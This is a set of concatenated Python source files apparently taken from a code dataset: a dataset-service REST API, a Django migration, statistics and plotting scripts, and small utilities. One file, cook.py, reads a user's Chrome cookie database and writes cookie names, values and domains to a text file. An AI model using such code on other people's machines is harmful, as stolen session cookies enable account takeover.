parameters\n :return: Connexion Error() type to return\n \"\"\"\n report = typename + ' already exists'\n logger().warning(struct_log(action=report, **kwargs))\n return dict(message=report, code=405)\n\n\ndef _report_update_failed(typename, exception, **kwargs):\n \"\"\"\n Generate standard log message + request error for error:\n Internal error performing update (PUT)\n :param typename: name of type involved\n :param exception: exception thrown by ORM\n :param **kwargs: arbitrary keyword parameters\n :return: Connexion Error() type to return\n \"\"\"\n report = typename + ' updated failed'\n message = 'Internal error updating '+typename+'s'\n logger().error(struct_log(action=report, exception=str(exception), **kwargs))\n return dict(message=message, code=500)\n\n\ndef _report_conversion_error(typename, exception, **kwargs):\n \"\"\"\n Generate standard log message + request error for warning:\n Trying to POST an object that already exists\n :param typename: name of type involved\n :param exception: exception thrown by ORM\n :param **kwargs: arbitrary keyword parameters\n :return: Connexion Error() type to return\n \"\"\"\n report = 'Could not convert '+typename+' to ORM model'\n message = typename + ': failed validation - could not convert to internal representation'\n logger().error(struct_log(action=report, exception=str(exception), **kwargs))\n return dict(message=message, code=400)\n\n\ndef _report_write_error(typename, exception, **kwargs):\n \"\"\"\n Generate standard log message + request error for error:\n Error writing to DB\n :param typename: name of type involved\n :param exception: exception thrown by ORM\n :param **kwargs: arbitrary keyword parameters\n :return: Connexion Error() type to return\n \"\"\"\n report = 'Internal error writing '+typename+' to DB'\n message = typename + ': internal error saving ORM object to DB'\n logger().error(struct_log(action=report, exception=str(exception), **kwargs))\n err = dict(message=message, code=500)\n return err\n\n@apilog\ndef post_dataset(body):\n \"\"\"\n Creates a new dataset following the dataset_ingest\n schema defined in datasets.yaml\n\n The ontologies_internal property is used when looking\n up current ontologies but is not a property to be returned\n when querying the dataset.\n\n\n :param body: POST request body\n :type body: object\n\n :returns: body, 201 on success, error code on failure\n :rtype: object, int \n\n .. 
note::\n Refer to the OpenAPI Spec for a proper schemas of dataset_ingest and dataset objects.\n\n \"\"\"\n\n db_session = get_session()\n\n if not body.get('id'):\n iid = uuid.uuid1()\n body['id'] = iid\n else:\n iid = body['id']\n\n if not body.get('version'):\n body['version'] = Version\n\n body['created'] = datetime.datetime.utcnow()\n mapped = []\n\n if body.get('ontologies'):\n\n # Ontology objects should be {'id': ontology_name, 'terms': [{'id': 'some code'}]}\n\n mapped = {ontology['id']: ontology['terms'] for ontology in body['ontologies']}\n if 'duo' in mapped.keys():\n validator = OntologyValidator(ont=ont, input_json=mapped)\n valid, invalids = validator.validate_duo()\n\n if not valid:\n err = dict(message=\"DUO Validation Errors encountered: \" + str(invalids), code=400)\n return err, 400\n\n duo_terms = json.loads(validator.get_duo_list())\n duos = []\n\n for term in duo_terms:\n stuff = OntologyParser(ont, term[\"id\"]).get_overview()\n duos.append({**term, **stuff})\n\n body['ontologies'] = duos\n body['ontologies_internal'] = mapped\n\n try:\n orm_dataset = Dataset(**body)\n except TypeError as e:\n err = _report_conversion_error('dataset', e, **body)\n return err, 400\n\n try:\n db_session.add(orm_dataset)\n db_session.commit()\n except exc.IntegrityError:\n db_session.rollback()\n err = _report_object_exists('dataset: ' + body['id'], **body)\n return err, 405\n except ORMException as e:\n db_session.rollback()\n err = _report_write_error('dataset', e, **body)\n return err, 500\n\n body.pop('ontologies_internal')\n return body, 201\n\n\n@apilog\ndef get_dataset_by_id(dataset_id):\n \"\"\"\n :param dataset_id: UUID\n :type dataset_id: string\n\n :return: dataset specified by UUID, 200 on success. Error code on failure.\n :rtype: dataset schema, int\n \"\"\"\n db_session = get_session()\n\n try:\n validate_uuid_string('id', dataset_id)\n specified_dataset = db_session.query(Dataset) \\\n .get(dataset_id)\n except IdentifierFormatError as e:\n err = dict(\n message=str(e),\n code=404)\n return err, 404\n\n if not specified_dataset:\n err = dict(message=\"Dataset not found: \" + str(dataset_id), code=404)\n return err, 404\n\n return dump(specified_dataset), 200\n\n\n@apilog\ndef delete_dataset_by_id(dataset_id):\n \"\"\"\n Current thoughts are that delete should only be a CLI accessible command\n rather than API\n\n :param dataset_id: UUID\n :return: 204 on successful delete\n \"\"\"\n db_session = get_session()\n\n try:\n specified_dataset = db_session.query(Dataset) \\\n .get(dataset_id)\n except ORMException as e:\n err = _report_search_failed('call', e, dataset_id=str(dataset_id))\n return err, 500\n\n if not specified_dataset:\n err = dict(message=\"Dataset not found: \" + str(dataset_id), code=404)\n return err, 404\n\n try:\n row = db_session.query(Dataset).filter(Dataset.id == dataset_id).first()\n db_session.delete(row)\n db_session.commit()\n except ORMException as e:\n err = _report_update_failed('dataset', e, dataset_id=str(dataset_id))\n return err, 500\n\n return None, 204\n\n\n@apilog\ndef search_datasets(tags=None, version=None, ontologies=None):\n \"\"\"\n :param tags: List of strings\n :param version: List of strings\n :param ontologies: List of ontology terms\n :return: List of datasets matching any of the supplied parameters\n \"\"\"\n db_session = get_session()\n print(tags, version, ontologies)\n try:\n datasets = db_session.query(Dataset)\n if version:\n datasets = datasets.filter(Dataset.version.like('%' + version + '%'))\n if tags:\n # return any 
project that matches at least one tag\n datasets = datasets.filter(or_(*[Dataset.tags.contains(tag) for tag in tags]))\n if ontologies:\n datasets = datasets.filter(or_(*[Dataset.ontologies_internal.contains(term) for term in ontologies]))\n\n except ORMException as e:\n err = _report_search_failed('dataset', e)\n return err, 500\n return [dump(x) for x in datasets], 200\n\n\n@apilog\ndef search_dataset_filters():\n \"\"\"\n Searches through filters specified in orm/filters_search.json\n\n :return: List of filters for project searches\n :rtype: object\n \"\"\"\n valid_filters = [\"tags\", \"version\"]\n\n return get_search_filters(valid_filters)\n\n\n@apilog\ndef get_search_filters(valid_filters):\n \"\"\"\n Helper for search_dataset_filters\n\n :param valid_filters: List of filter names currently valid in the system\n :return: List of filter structures matching the names in valid_filters\n \"\"\"\n filter_file = pkg_resources.resource_filename('candig_dataset_service',\n 'orm/filters_search.json')\n\n with open(filter_file, 'r') as filters:\n search_filters = json.load(filters)\n\n response = []\n\n for search_filter in search_filters:\n if search_filter[\"filter\"] in valid_filters:\n response.append(search_filter)\n\n return response, 200\n\n\n@apilog\ndef search_dataset_ontologies():\n \"\"\"\n Queries the dataset database for all ontology terms used by the stored datasets.\n\n :return: List of all ontologies currently used by datasets\n \"\"\"\n\n db_session = get_session()\n try:\n datasets = db_session.query(Dataset)\n\n valid = datasets.filter(Dataset.ontologies != [])\n\n ontologies = [dump(x)['ontologies'] for x in valid]\n\n terms = sorted(list(set([term['id'] for ontology in ontologies for term in ontology])))\n\n except ORMException as e:\n err = _report_search_failed('dataset', e)\n return err, 500\n\n return terms, 200\n\ndef search_dataset_discover(tags=None, version=None):\n \"\"\"\n Discovery methods are not implemented at this time\n \"\"\"\n err = dict(\n message=\"Not implemented\",\n code=501\n )\n\n return err, 501\n\n\ndef get_datasets_discover_filters(tags=None, version=None):\n \"\"\"\n Discovery methods are not implemented at this time\n \"\"\"\n err = dict(\n message=\"Not implemented\",\n code=501\n )\n return err, 501\n\n\n@apilog\ndef post_change_log(body):\n \"\"\"\n Create a new change log following the changeLog\n schema in datasets.yaml\n\n :param body: POST body object following the changeLog schema\n :type body: object\n\n :return: body, 200 on success\n \"\"\"\n db_session = get_session()\n change_version = body.get('version')\n\n body['created'] = datetime.datetime.utcnow()\n\n try:\n orm_changelog = ChangeLog(**body)\n except TypeError as e:\n err = _report_conversion_error('changelog', e, **body)\n return err, 400\n\n try:\n db_session.add(orm_changelog)\n db_session.commit()\n except exc.IntegrityError:\n db_session.rollback()\n err = _report_object_exists('changelog: ' + body['version'], **body)\n return err, 405\n except ORMException as e:\n err = _report_write_error('changelog', e, **body)\n return err, 500\n\n logger().info(struct_log(action='post_change_log', status='created',\n change_version=change_version, **body))\n\n return body, 201\n\n\n\n@apilog\ndef get_versions():\n \"\"\"\n Query the change logs for and gather all the versions\n to return. 
\n\n :return: List of release versions of the database\n :rtype: string\n \"\"\"\n db_session = get_session()\n change_log = ChangeLog\n\n try:\n versions = db_session.query(change_log.version)\n except ORMException as e:\n err = _report_search_failed('versions', e)\n return err, 500\n\n return [entry.version for entry in versions], 200\n\n\n@apilog\ndef get_change_log(version):\n \"\"\"\n Query the database for a specific change log based on version\n\n :param version: required release version\n :return: changes associated with specified release version\n \"\"\"\n db_session = get_session()\n change_log = ChangeLog\n\n try:\n log = db_session.query(change_log)\\\n .get(version)\n except ORMException as e:\n err = _report_search_failed('change log', e)\n return err, 500\n\n if not log:\n err = dict(message=\"Change log not found\", code=404)\n return err, 404\n\n return dump(log), 200\n\n\ndef validate_uuid_string(field_name, uuid_str):\n \"\"\"\n Validate that the id parameter is a valid UUID string\n\n :param uuid_str: query parameter\n :param field_name: id field name\n \"\"\"\n try:\n uuid.UUID(uuid_str)\n except ValueError:\n raise IdentifierFormatError(field_name)\n return\n\n","repo_name":"CanDIG/datasets_service","sub_path":"candig_dataset_service/api/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":12926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11715483599","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('dashboard', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='GatewayNode',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n ('modified_timestamp', models.DateTimeField(auto_now=True)),\n ('node_type', models.IntegerField(default=0, choices=[(1, 'Gateway'), (2, 'Sensor-ReedSwitch'), (3, 'Sensor-EstimoteStickers'), (0, 'Others')])),\n ('node_id', models.IntegerField(unique=True, verbose_name='Node ID')),\n ('node_desc', models.CharField(max_length=32, null=True, blank=True)),\n ('user2', models.ForeignKey(blank=True, to=settings.AUTH_USER_MODEL, null=True)),\n ],\n options={\n 'verbose_name_plural': 'Gateway Node',\n 'verbose_name': 'Gateway Node',\n },\n ),\n migrations.CreateModel(\n name='SensorStickerReading',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),\n ('modified_timestamp', models.DateTimeField(auto_now=True)),\n ('server_timestamp', models.DateTimeField(null=True, blank=True)),\n ('gw_timestamp', models.DateTimeField(null=True, blank=True)),\n ('acc_x', models.FloatField(default=0.0)),\n ('acc_y', models.FloatField(default=0.0)),\n ('acc_z', models.FloatField(default=0.0)),\n ('battery_level', models.CharField(max_length=16)),\n ('power', models.IntegerField(default=1)),\n ('gw_id', models.ForeignKey(blank=True, to='dashboard.GatewayNode', null=True)),\n ('sensor_id', models.ForeignKey(to='dashboard.SensorNode')),\n ],\n options={\n 'verbose_name_plural': 'Sensor (Estimote Sticker) Reading',\n 'verbose_name': 'Sensor (Estimote Sticker) Reading',\n },\n ),\n 
]\n","repo_name":"anduslim/aws_iot","sub_path":"aws_iot/dashboard/migrations/0002_gatewaynode_sensorstickerreading.py","file_name":"0002_gatewaynode_sensorstickerreading.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36375421066","text":"import sqlite3\nimport http.cookiejar\nimport os\n \n \n \n#Capture only these domains in the cookie file\n#Or change to URL_Filter = [''] to capture all cookies\n#URL_Filter = ['maco.siteground.com']\nURL_Filter = ['']\n#Desired output filename\nfile_name = ('cookies.txt')\n \n#Change USER and PROFILE to correct names\ncookie_sql = (\"/Users/petar.artinov/Library/Application Support/Google/Chrome/Profile 1/Cookies\")\n \n # cur.execute(\"SELECT host, path, isSecure, expiry, name, value FROM moz_cookies\")\n # for item in cur.fetchall():\n # c = http.cookiejar.Cookie(0, item[4]//name, item[5]//value,\n # None, False,\n # item[0] //host, item[0].startswith('.')//host, item[0].startswith('.')//host,\n # item[1]//path, False,\n # item[2]//isSecure,\n # item[3]//expiry, item[3]==\"\"//expiry,\n # None, None, {})\n # cj.set_cookie(c)\n # /Users/petar.artinov/Library/Application\\ Support/Google/Chrome/Profile 1/Local\\ Storage\n \ndef get_cookies(cj, ff_cookies):\n con = sqlite3.connect(ff_cookies)\n cur = con.cursor()\n cur.execute(\"SELECT host_key, path, is_secure, expires_utc, name, value, encrypted_value FROM cookies\") #host, path, isSecure, expiry,\n for item in cur.fetchall():\n print(item[6])\n c = http.cookiejar.Cookie(0, item[4], item[5],\n None, False,\n item[0], item[0].startswith('.'), item[0].startswith('.'),\n item[1], False,\n item[2],\n item[3], item[3]==\"\",\n None, None, {})\n cj.set_cookie(c)\n \ndef save_cookies():\n f_direc = (os.path.dirname(os.path.abspath(__file__))+os.path.sep)\n cj = http.cookiejar.CookieJar()\n get_cookies(cj, cookie_sql)\n with open(f_direc+file_name, \"w\") as new: new.write('')\n for x in cj:\n with open(f_direc+file_name, \"a\") as f:\n if any(domain.lower() in x.domain.lower() for domain in URL_Filter):\n \n #Edit( '{n}, {v}, {d}\\n' )to change format of cookie output in the .txt file\n f.write('{n}, {v}, {d}\\n'.format(n=x.name,v=x.value,d=x.domain))\n \nsave_cookies()","repo_name":"partinov/sgstuff","sub_path":"cook.py","file_name":"cook.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10422053493","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 21 15:17:37 2017\n\n@author: hyeongyu\n\"\"\"\n\n\n\nimport os\nimport pandas as pd\nimport numpy as np\n\n###################################################################\n#################### 필요한 함수 정의 부분 #################\n###################################################################\n#RV coeff 분모 구하는 부분\ndef cal_RVDenom(data, type_set=\"orig\"):\n p = range(np.shape(data)[1])\n n = np.shape(data)[0]\n\n abs_cov = abs(np.cov(data.T)) \n cov_sqr = [(abs_cov[(i,j)])**2 for i in p for j in p] \n r = sum(cov_sqr)\n if type_set == 'mod':\n mod_cal = [sum(np.square(data)[:,i] * np.square(data)[:,j] / np.square(n-1)) for i in p for j in p] \n cov_sqr_m =[cov_sqr[i] - mod_cal[i] for i in range(len(cov_sqr))] \n r = sum(cov_sqr_m)\n return r\n\n#RV coeff 구하는 부분\ndef RV(X, Y, type_set=\"orig\"):\n \n data1 = np.array(X)\n data2 = np.array(Y)\n \n #각 컬럼 별 표준화 \n data1 = (data1 - data1.mean(axis=0))/(data1.std(axis=0))\n data2 = (data2 - 
data2.mean(axis=0))/(data2.std(axis=0))\n\n    n = np.shape(data1)[0]\n    p1 = range(np.shape(data1)[1])\n    p2 = range(np.shape(data2)[1])\n    \n    comb = [(i,j) for i in p1 for j in p2]\n    \n    #calculate numerator \n    vecnum = [] \n    for i in comb: \n        elemnum = np.square(np.cov(data1[:,i[0]], data2[:,i[1]])[0,1])\n        # for the modified\n        if type_set==\"mod\":\n            elemnum -= sum((data1[:,i[0]] ** 2) * (data2[:,i[1]]) **2)/np.square(n-1) \n        vecnum.append(elemnum)\n    num = sum(vecnum)\n    \n    #calculate denominator \n    denom1 = cal_RVDenom(data1, type_set)\n    denom2 = cal_RVDenom(data2, type_set)\n\n    RV = num/np.sqrt(denom1*denom2)\n    \n    return RV\n\n#################################################################\n#############        Variable and parameter settings      ###################\n#################################################################\n# beta computation settings\nperiod_list = [1,3,6,12] # beta computation periods (in months)\n\ndirectory = r\"C:\\Users\\User\\Documents\\bro_py\" #default directory\nindex_list = ['preprocess_nan_DAX30_all.csv', 'preprocess_nan_kospi200_all_all.csv', 'preprocess_nan_nikkei225_all.csv', 'preprocess_nan_SnP500_all.csv', 'preprocess_nan_SSE50_all.csv']\n\nskip_cf = 48 # skip a company if it has less than 4 years of data\n#################################################################\n#############        Actual computation      ###################\n#################################################################\n# set the default directory\nos.chdir(directory)\n\nrd_dir = 'Preprocessed_dataset\\\\Modeling_Data_all\\\\'\nwt_dir = 'Preprocessed_dataset\\\\Network_Data_all\\\\'\n\n\n\nif not os.path.exists(wt_dir):\n    os.makedirs(wt_dir )\n\n\nfor period in period_list:\n    # output of the execution results \n    # directory where the generated files are stored \n    read_directory = 'Close_Volume_Beta_'+str(period) +'_v2'\n    for indexnm in index_list: \n        skip_corp_list = []\n\n        data_org = pd.read_csv(read_directory+'\\\\'+indexnm)\n        data_org.index = data_org.iloc[:,0]\n        data =data_org.drop(data_org.columns[0],1)\n\n        num_comp = np.shape(data)[1]\n\n        # the two companies must have the same number of rows\n        X = data.iloc[:,list(range(num_comp-3,num_comp ))]\n        Y = data.iloc[:,list(range(num_comp-6,num_comp-3 ))]\n        \n        X.columns\n        Y.columns \n        \n        too_many_nan = False\n\n        intersection_date = set(X.index[list(~np.isnan(X.iloc[:,2]))]).intersection(Y.index[list(~np.isnan(Y.iloc[:,2]))])\n        \n        inter_X = X.loc[intersection_date ,]\n        inter_Y = Y.loc[intersection_date ,]\n        \n        X_index = inter_X.columns[0][:-6]\n        Y_index = inter_Y.columns[0][:-6]\n        \n        if len(intersection_date) < skip_cf:\n            too_many_nan = True\n            continue\n        \n        rv_coef = RV(inter_X, inter_Y )\n        \n        \n        print(str(period), indexnm[18:-4], '\\t', X_index,'\\t', Y_index, '\\t',rv_coef)\n        \n    ","repo_name":"5eo1ab/competition-index-prediction","sub_path":"data_preprocess_code/ck_err_cormat_val.py","file_name":"ck_err_cormat_val.py","file_ext":"py","file_size_in_byte":4109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"1086693572","text":"'''\nTwo identical sequences\nPseudocode\n1. Read in lists A and B.\n2. Compare each element of A against every element of B, and if an equal value exists,\n3. set flag to True and escape the nested for loop.\n4. Print Yes if repeat() returns True, No if it returns False.\n\nSelf-review\nThis could have been a single function or plain procedural code, but I wrote it as a class to practice classes as well.\nThe flag is a technique I like: when you want to leave the inner loop of a nested for loop on some condition,\nit lets you escape the outer loop together with it. It could still use a cleaner refactoring, though.\n\n'''\nclass Comparison:\n    # output part\n    def __init__(self, lst1, lst2):\n        if self.repeat(lst1, lst2):\n            print('Yes')\n        else:\n            print('No')\n\n    # computation part\n    def repeat(self, lst1, lst2):\n        for num_first_seq in lst1: \n            flag = False\n            for num_second_seq in lst2:\n                if num_first_seq == num_second_seq:\n                    flag = True\n                    break  # escape the inner loop, as described in the pseudocode\n            \n            if not flag:\n                return False\n        \n        return True\n    \n\n    \nn = int(input())\n\nA = list(map(int,input().split()))\nB = list(map(int,input().split()))\n\nComparison(A,B)","repo_name":"cjm40302537/challenge30-codingtest-study","sub_path":"이영훈-yeonghune/Lv2/TwoIdenticalSequences.py","file_name":"TwoIdenticalSequences.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"ko","doc_type":"code","dataset":"github-code","pt":"37"}
{"seq_id":"20306770466","text":"from src.db.mongoDB.mongo_settings import series_collection\n\n\nasync def insert_document(collection, data):\n    return collection.insert_one(data).inserted_id\n\n\nasync def get_document(collection, type_url: str, url: str):\n    data = {type_url: url}\n    return collection.find_one(data)\n\n\nasync def check_url(type_url: str, url: str):\n    res = await get_document(series_collection, type_url, url)\n    if not res:\n        return False, res\n    return True, res\n\n\nasync def save_urls(long_url: str, short_url: str):\n    data = {\n        \"long_url\": long_url,\n        \"short_url\": short_url,\n    }\n    await insert_document(series_collection, data)\n","repo_name":"RautaruukkiPalich/Pali.ch","sub_path":"src/db/funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"7110859795","text":"from analysistools.StatisticDataFrame import StatisticDataFrame\nfrom analysistools.PlotBuilder import PlotBuilder\nfrom pprint import pprint\nfrom time import time\nimport configparser as cp\nimport json\n\n\nconfig = cp.ConfigParser()\nconfig.read(\"settings.ini\")\n\n\ndef load_plot_lines(plot_data, statistic_name, statistic_plot):\n    color_list = json.loads(config.get(\"Plot_Profile\", \"color_list\"))\n    color_index = 0\n    x_error_bar = None\n\n    for statistic_data in plot_data[statistic_name]:\n        if len(statistic_data) > 3:\n            x_error_bar = statistic_data[3]\n\n        statistic_plot.add_plot_line(statistic_data[0], statistic_data[1], statistic_data[2],\n                                     x_error_bar=x_error_bar, color=color_list[color_index])\n        color_index = color_index+1\n\n\ndef plot_statistic(statistic_name, plot_data, plot_profile, x_axis_name=\"\", y_axis_name=\"\"):\n    plot = PlotBuilder(plot_profile=plot_profile)\n    plot.set_axes_label(x_axis_name, y_axis_name)\n\n    load_plot_lines(plot_data=plot_data, statistic_name=statistic_name, statistic_plot=plot)\n\n    if config[\"General\"].getboolean(\"save_to_file\"):\n        
plot.to_image(directory=config[\"General\"][\"export_directory\"], file_name=statistic_name + \"_\" + str(time()), image_format=\"png\")\n\n if config[\"General\"].getboolean(\"draw_plots\"):\n plot.draw()\n\n\ndef plot_qq(statistic_name, plot_data, x_axis_name=\"\", y_axis_name=\"\"):\n color_list = json.loads(config.get(\"Plot_Profile\", \"color_list\"))\n color_index = 0\n\n for statistic_data in plot_data[statistic_name]:\n plot = PlotBuilder(plot_profile=\"qq\")\n plot.set_axes_label(x_axis_name, y_axis_name)\n\n plot.add_plot_line(statistic_data[0], statistic_data[1], statistic_data[2], regression_x=statistic_data[3], regression_y=statistic_data[4], color=color_list[color_index])\n color_index = color_index+1\n\n if config[\"General\"].getboolean(\"save_to_file\"):\n plot.to_image(directory=config[\"General\"][\"export_directory\"], file_name=statistic_name + \"_\" + str(time()), image_format=\"png\")\n\n if config[\"General\"].getboolean(\"draw_plots\"):\n plot.draw()\n\n\ndef main():\n cashier_level = json.loads(config.get(\"Analysis\", \"cashier_level\"))\n statistic_list = json.loads(config.get(\"Analysis\", \"statistic_list\"))\n confidence_level = config[\"Analysis\"].getfloat(\"confidence_level\")\n dataframe = StatisticDataFrame(config[\"General\"][\"working_csv\"])\n\n '''************* DATA ANALYSIS *************'''\n start_time = time()\n\n #ECDF_data = dataframe.get_ECDF_data(statistic_list, cashier_level, confidence_level)\n #ECDF_no_error = dataframe.get_ECDF_data(statistic_list, cashier_level, confidence_level=None)\n #Lorenz_data = dataframe.get_Lorenz_Curve_data(statistic_list, cashier_level)\n #histogram_data = dataframe.get_histogram_data(statistic_list, cashier_level, number_bins=200)\n #qq_data = dataframe.get_qq_plot_data(statistic_list, cashier_level, theoretical_distribution=\"weibull\", weibull_shape=0.8)\n #sample_mean = dataframe.get_sample_mean(statistic_list, cashier_level, confidence_level)\n #sample_median = dataframe.get_sample_median(statistic_list, cashier_level, confidence_level)\n #sample_CoV = dataframe.get_sample_coefficient_of_variation(statistic_list, cashier_level)\n\n print(\"Data analysis completed\")\n print(\"--- %s seconds ---\" % (time() - start_time))\n\n '''************* DATA PLOT *************'''\n\n \"\"\"\n pprint(sample_mean)\n pprint(sample_median)\n pprint(sample_CoV)\n \"\"\"\n\n \"\"\"\n plot_statistic(\"waitingTimeVipCustomerCashierQueueStatistic\", ECDF_data, plot_profile=\"ecdf\", x_axis_name=r'$W^{VIP}_{CASHIER} [min]$', y_axis_name=\"Probability\")\n plot_statistic(\"responseTimeVipCustomerCashierNodeStatistic\", ECDF_data, plot_profile=\"ecdf\", x_axis_name=r'$R^{VIP}_{CASHIER} [min]$', y_axis_name=\"Probability\")\n plot_statistic(\"waitingTimeNormalCustomerCashierQueueStatistic\", ECDF_data, plot_profile=\"ecdf\", x_axis_name=r'$W^{NORMAL}_{CASHIER} [min]$', y_axis_name=\"Probability\")\n plot_statistic(\"responseTimeNormalCustomerCashierNodeStatistic\", ECDF_data, plot_profile=\"ecdf\", x_axis_name=r'$R^{NORMAL}_{CASHIER} [min]$', y_axis_name=\"Probability\")\n \"\"\"\n\n \"\"\"\n plot_statistic(\"waitingTimeVipCustomerCashierQueueStatistic\", ECDF_no_error, plot_profile=\"ecdf\", x_axis_name=\"Waiting time VIP customer [s]\", y_axis_name=\"Probability\")\n plot_statistic(\"responseTimeVipCustomerCashierNodeStatistic\", ECDF_no_error, plot_profile=\"ecdf\", x_axis_name=\"Response time VIP customer [s]\", y_axis_name=\"Probability\")\n plot_statistic(\"waitingTimeNormalCustomerCashierQueueStatistic\", ECDF_no_error, 
plot_profile=\"ecdf\", x_axis_name=\"Waiting time normal customer [s]\", y_axis_name=\"Probability\")\n plot_statistic(\"responseTimeNormalCustomerCashierNodeStatistic\", ECDF_no_error, plot_profile=\"ecdf\", x_axis_name=\"Response time normal customer [s]\", y_axis_name=\"Probability\")\n \"\"\"\n\n \"\"\"\n plot_statistic(\"waitingTimeVipCustomerCashierQueueStatistic\", Lorenz_data, plot_profile=\"lorenz\", x_axis_name=\"Waiting time VIP customer\")\n plot_statistic(\"responseTimeVipCustomerCashierNodeStatistic\", Lorenz_data, plot_profile=\"lorenz\", x_axis_name=\"Response time VIP customer\")\n plot_statistic(\"waitingTimeNormalCustomerCashierQueueStatistic\", Lorenz_data, plot_profile=\"lorenz\", x_axis_name=\"Waiting time normal customer\")\n plot_statistic(\"responseTimeNormalCustomerCashierNodeStatistic\", Lorenz_data, plot_profile=\"lorenz\", x_axis_name=\"Response time normal customer\")\n \"\"\"\n\n \"\"\"\n plot_histogram(\"waitingTimeVipCustomerCashierQueueStatistic\", histogram_data, x_axis_name=\"Waiting time VIP customer [s]\", y_axis_name=\"Frequency\")\n plot_histogram(\"responseTimeVipCustomerCashierNodeStatistic\", histogram_data, x_axis_name=\"Response time VIP customer [s]\", y_axis_name=\"Frequency\")\n plot_histogram(\"waitingTimeNormalCustomerCashierQueueStatistic\", histogram_data, x_axis_name=\"Waiting time normal customer [s]\", y_axis_name=\"Frequency\")\n plot_histogram(\"responseTimeNormalCustomerCashierNodeStatistic\", histogram_data, x_axis_name=\"Response time normal customer [s]\", y_axis_name=\"Frequency\")\n \"\"\"\n\n \"\"\"\n plot_qq(\"waitingTimeVipCustomerCashierQueueStatistic\", qq_data, y_axis_name=r'$W^{VIP}_{CASHIER} [s]', x_axis_name=\"Weibull quantile\")\n plot_qq(\"responseTimeVipCustomerCashierNodeStatistic\", qq_data, y_axis_name=r'$R^{VIP}_{CASHIER} [s]$', x_axis_name=\"Weibull quantile (k = 1.15)\")\n plot_qq(\"waitingTimeNormalCustomerCashierQueueStatistic\", qq_data, y_axis_name=r'$W^{NORMAL}_{CASHIER} [s]', x_axis_name=\"Weibull quantile\")\n plot_qq(\"responseTimeNormalCustomerCashierNodeStatistic\", qq_data, y_axis_name=r'$R^{NORMAL}_{CASHIER} [s]$', x_axis_name=\"Weibull quantile (k = 0.95)\")\n \"\"\"\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"diegocasu/FacultyBar","sub_path":"DataAnalysis/WaitingResponseTimes/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":7641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69965542509","text":"#!/usr/bin/python\n# coding: utf-8\n\nfrom pprint import pprint\nfrom pylab import *\nfrom collections import defaultdict\n\nfrom collections import deque\n\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\n\n# TODO: setting/write_drawを追加してぐちゃぐちゃになったから, 一回整理する.\n\nclass Plotter(object):\n\n def __init__(self):\n self.graphs = []\n self.xdata = defaultdict(lambda: defaultdict(list))\n self.ydata = defaultdict(lambda: defaultdict(list))\n self.initialized = False\n self.plots = defaultdict(lambda: defaultdict(list))\n\n self.settings = None\n\n def write(self, title, y_value, x_value=None):\n \"\"\"\n for non-movable\n\n y_values = {'plus':1, 'minus': 1}\n x_values = {'plus':1, 'minus': 1}\n \"\"\"\n for key, value in y_value.items():\n self.ydata[title][key].append(value)\n\n if x_value is not None:\n for key, value in x_value.items():\n self.xdata[title][key].append(value)\n else:\n for key, value in y_value.items():\n self.xdata[title][key].append(len(self.xdata[title][key]))\n\n def 
reset(self):\n self.graphs = []\n self.plots = defaultdict(lambda: defaultdict(list))\n self.xdata = defaultdict(lambda: defaultdict(list))\n self.ydata = defaultdict(lambda: defaultdict(list))\n self.initialize(self.settings, self.movable)\n\n def add(self, title, y_values, x_values=None):\n \"\"\"\n for non-movable\n\n y_values = {'plus':[1, 2, 3, ..], 'minus': [1, 2, 3, ...]}\n x_values = {'plus':[1, 2, 3, ..], 'minus': [1, 2, 3, ...]}\n \"\"\"\n self.ydata[title].update(y_values)\n if x_values is not None:\n self.xdata[title].update(x_values)\n else:\n self.xdata[title].update(dict([(subt, range(len(values))) for subt,values in y_values.items()]))\n\n\n def show(self, save_dir=None, file_name=None):\n \"\"\"\n for non-movable\n\n if save_dir and file_name is not None,\n this method save image and do not show.\n \"\"\"\n\n if self.movable:\n plt.ioff()\n plt.show()\n return\n\n for idx, title in enumerate(self.settings.keys()):\n for sub_title in self.settings[title]['sub_title']:\n self.plots[title][sub_title].set_xdata(self.xdata[title][sub_title])\n self.plots[title][sub_title].set_ydata(self.ydata[title][sub_title])\n\n self.graphs[idx].legend(tuple(self.settings[title]['sub_title']), loc=3)\n self.graphs[idx].relim()\n self.graphs[idx].autoscale_view(True, True, True)\n\n if save_dir is not None and file_name is not None:\n plt.savefig(save_dir + file_name)\n else:\n plt.show()\n\n\n\n def initialize(self, settings, movable=False):\n self.settings = settings\n self.movable = movable\n\n self.fig = plt.figure(figsize=(16, 10))\n gs = gridspec.GridSpec(len(settings), 1)\n\n\n WINDOW = 100\n if movable:\n plt.ion()\n\n # graph setting\n for idx, title in enumerate(settings.keys()):\n self.graphs.append(self.fig.add_subplot(gs[idx, 0]))\n if settings[title].has_key('ylim'):\n plt.ylim( settings[title]['ylim'] )\n plt.title( title )\n\n for idx, title in enumerate(settings.keys()):\n for sub_title in settings[title]['sub_title']:\n if movable:\n self.xdata[title][sub_title] = deque([0.0] * WINDOW, maxlen=WINDOW)\n self.ydata[title][sub_title] = deque([0.0] * WINDOW, 